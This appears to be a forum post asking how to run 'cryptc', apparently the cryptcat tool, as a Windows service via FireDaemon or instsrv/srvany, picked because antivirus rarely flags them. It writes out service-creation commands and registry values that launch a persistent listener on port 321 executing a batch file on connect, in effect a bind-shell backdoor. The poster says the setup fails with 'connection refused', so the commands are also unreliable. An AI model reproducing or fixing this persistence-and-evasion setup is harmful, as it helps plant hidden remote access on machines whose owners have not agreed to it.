Hey , I was wondering if anyone can help me out here.. Im tryin to install a service with firedaemon and i get this, i Have FireDaemon.exe any other files i need really?
Service installation failed: MXBIN environment variable undefined. Error code: 0
Also scince most av pick up FireDaemon i was wondering if there was a program out there that would install an app to a service with parameters. I tried 2 things... Instsrv and srvany scince most av dont pick but also Service manager v1.3, © Hideout Inc
I tried these 2 diff ways...
services createsvrany "cryptc" "cryptc" "c:\exp\srvany.exe"" "c:\exp\cryptc.exe"
regedit /s cryptc.reg
and in cryptc.reg
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cryptc\Parameters]
"AppParameters"="-l -L -t -k fuckyou -p 321 -e check.bat"
no firewalls or anything running. if i put the command myself it works fine
and the other thing i tried was
instsrv.exe cryptc c:\exp\srvany.exe
REG.EXE add HKLM\SYSTEM\CurrentControlSet\Services\cryptc\Parameters\Application=C:\exp\cryptc.exe
REG.EXE add HKLM\SYSTEM\CurrentControlSet\Services\cryptc\Parameters\AppParameters="-l -L -t -k fuckyou -p 321 -e check.bat"
Both give me connection refused, i think the app parameters is messing up somehow...
if i put the command in myself it works fine
